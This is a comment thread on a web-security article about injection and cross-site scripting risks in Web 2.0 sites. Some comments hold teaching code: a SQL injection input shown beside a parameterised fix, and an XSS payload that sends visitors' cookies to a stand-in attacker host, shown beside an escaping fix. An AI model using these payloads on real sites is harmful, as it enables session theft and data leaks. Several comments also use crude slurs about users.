All web applications allow some form of rich data, but rich data has become a key part of Web 2.0. Data is "rich" if it allows markup, special characters, images, formatting, and other complex syntax. This richness allows users to create new and innovative content and services. Unfortunately, richness affords attackers an …
Why is this news?
See title. Is there anyone sitting here reading this saying "Wow - hadn't looked at it like that before?"
Paris, because even she's aware of the dangers of someone inserting something they shouldn't.
RE: Why is this news?
Because, believe it or not, injection vulnerabilities are still pervasive all around the Web.
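For anyone who hasn't actually seen the failure mode, here is a minimal sketch of the classic SQL injection and its fix, using Python's standard-library sqlite3 module (the table, rows, and hostile input are invented for illustration):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, secret TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 's3cret')")

user_input = "' OR '1'='1"  # hostile input supplied by an attacker

# Vulnerable: user input spliced straight into the SQL string,
# so the attacker's quotes rewrite the query's logic.
vulnerable = conn.execute(
    "SELECT secret FROM users WHERE name = '" + user_input + "'"
).fetchall()

# Safe: a parameterised query passes the value separately from the code,
# so the driver treats it as data, never as SQL.
safe = conn.execute(
    "SELECT secret FROM users WHERE name = ?", (user_input,)
).fetchall()

print(vulnerable)  # leaks every row: [('s3cret',)]
print(safe)        # matches nothing: []
```

The pattern is the same in every driver and language: never build queries by string concatenation with user input.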
You May As Well Fireproof A Paper House
What else is there to say?
swings and roundabouts
The only way to truly fight security risk, imo, is education of Joe Public "look at me, I've got an Apple" IT retards - aka 99% of the world population. As this will never happen (Joe Public doesn't care and is too stupid anyway), I suggest banning everyone from using computers until they can demonstrate how to use a computer responsibly (if ever).
Paris might be aware of the danger, but in the heat of the moment she hardly ever wears a wrapper and often reuses things in new and untied locations.
Why is this news - again?
Maybe because we don't learn - "don't mix data and code"! Maybe next we'll even get self-modifying code that the user can send to systems? Sorry, seems I'm a little slow today - we already have it, again! As long as corporations or their minions buy whatever "new" and glorious technologies without any criteria, it will go on and on. Besides, it's not "rich data", it's "rich code" if there is anything in it that causes execution - and would someone give the official definition of Web 2.0, or a standards definition? I've been looking for it for a while now - which RFC?
Blame users for XSS?
If Joe User browses a blog that has been infected via cross-site scripting, how is it his fault?
He is probably a regular user of the site and has not experienced any problems in the past. He has no opportunity to examine the source code of the site to ensure inputs are properly validated and there are no flaky dynamic SQL statements. He could possibly run a suite of test programs against the site to check for security vulnerabilities - but could face criminal charges for doing so.
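The fix for the stored-XSS scenario described above does indeed belong on the server, not with the user: anything user-supplied must be escaped before it is echoed back into a page. A minimal sketch using Python's standard library (the comment text is an invented example of an attacker's submission):

```python
import html

# A comment as an attacker might submit it to a blog.
comment = '<script>document.location="http://evil.example/?c="+document.cookie</script>'

# Rendering it verbatim hands the attacker script execution
# in the browser of every visitor who views the comment.
unsafe_html = "<p>" + comment + "</p>"

# Escaping turns the markup into inert text before it reaches the page.
safe_html = "<p>" + html.escape(comment) + "</p>"

print(safe_html)
```

After escaping, the `<script>` tag survives only as the harmless text `&lt;script&gt;`, so the browser displays it instead of executing it.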
The current crop of malware goes way beyond the "click here to see pictures of nude tennis star" in terms of sophistication and stealth.
So this one really is down to ISPs and website developers to get their act together.
So far the only real protection you can get is AVG's nifty page scanner - the one that has ISPs and website owners screaming because it scans links before you click them and doubles their traffic.
Blame the *users*? Blame the USERS? Furrfu...
How is it the user's fault that "web developers" are, for the most part, incompetent knuckle-dragging buffoons? Should users be expected to retrieve and peruse the source (including all the scripts, stylesheets, embedded images, Flash videos, PDFs, QuickTime movies and all the other crap that gets embedded into HTML documents nowadays) for each page and identify whether there may be security issues with it before opening it in a browser? Is it really too much to ask to expect people who are (nominally at least) professional programmers to actually have at least the rudiments of a clue about the job?
I suggest banning Register readers from commenting until they can demonstrate how to comment sensibly (if ever).
Web 2.0 is a Mega Fail -- this whole SUBJECT is dumb.
Hear me out.
Listen, you want to know how to do a proper website? It's easy. I've been doing it for over ten years. Try this on for size:
1) All code belongs on the server side. Use an OOP language like Java or C#. Ideally, you should separate out your database-touching code on an app server behind an extra firewall (you want at least 3 tiers, plus the user's browser). If you're a tiny shop on a hosting service, and all you've got is the web tier and a database, you've got to make do with that. Pick a hosting service that uses Unix, it's generally a little safer. Your server side code should accept the user's inputs, then validate them (don't forget that part!), formulate a response and send an assembled web page back to the browser. This means the browser only sees static pages, which makes it friendlier to a wide variety of browsers and screen readers (for the blind) as well.
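The validate-then-assemble step this comment describes can be sketched in a few lines. The commenter suggests Java or C#; this illustration uses Python for brevity, and the field name and whitelist rule are invented:

```python
import re

def handle_request(form: dict) -> str:
    """Validate user input server-side, then return a fully assembled page."""
    username = form.get("username", "")
    # Whitelist validation: reject anything outside a known-good pattern
    # instead of trying to blacklist every dangerous character.
    if not re.fullmatch(r"[A-Za-z0-9_]{1,32}", username):
        return "<html><body><p>Invalid username.</p></body></html>"
    # The input is now known to contain no markup, so the assembled
    # page the browser receives is purely static HTML.
    return f"<html><body><p>Welcome, {username}!</p></body></html>"

print(handle_request({"username": "alice_99"}))
print(handle_request({"username": "<script>alert(1)</script>"}))
```

The whitelist approach is the key design choice: the server accepts only inputs it positively recognises as safe, so hostile markup never survives to the assembled page.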
3) If you really MUST have an interactive website, like for example, if you're doing a movie ad, do it in Flash, and have it only display static data you've staged in the browser. Flash is ideal for MOVIES, and MUSIC and GAMES. For everything else it's a complete waste of time and it locks out the blind and people with alternative browsers so it's not very socially friendly.
4) Whenever someone in your office starts talking about Ajax or Web 2.0, BITCH SLAP HIM. Explain that it's for his own good and you're only trying to help, then ask him if the feeling has passed. If he hasn't been cured yet, repeat as necessary.
The web is a mature medium, with many established, safe practices. Try adhering to what's been proven to work, and stop trying to change everything every couple of years!
Paris because... Well... She's cute, isn't she?
When, in #3, I said "If you really MUST have an interactive website" I meant "If you really MUST have a website that is interactive without the traditional post-to-server, refresh page approach". Sorry about that.
Obviously everything's interactive these days; otherwise you wouldn't NEED server-side code. The problem with AJAX is that designers want websites to act like desktop applications, and vendors are lining up in agreement (because they want to rent you software as a service in perpetuity instead of sell you software once). My position is that it's all snake oil being foisted on you for selfish reasons and you're better off doing it the old way.
Sorry for being unclear.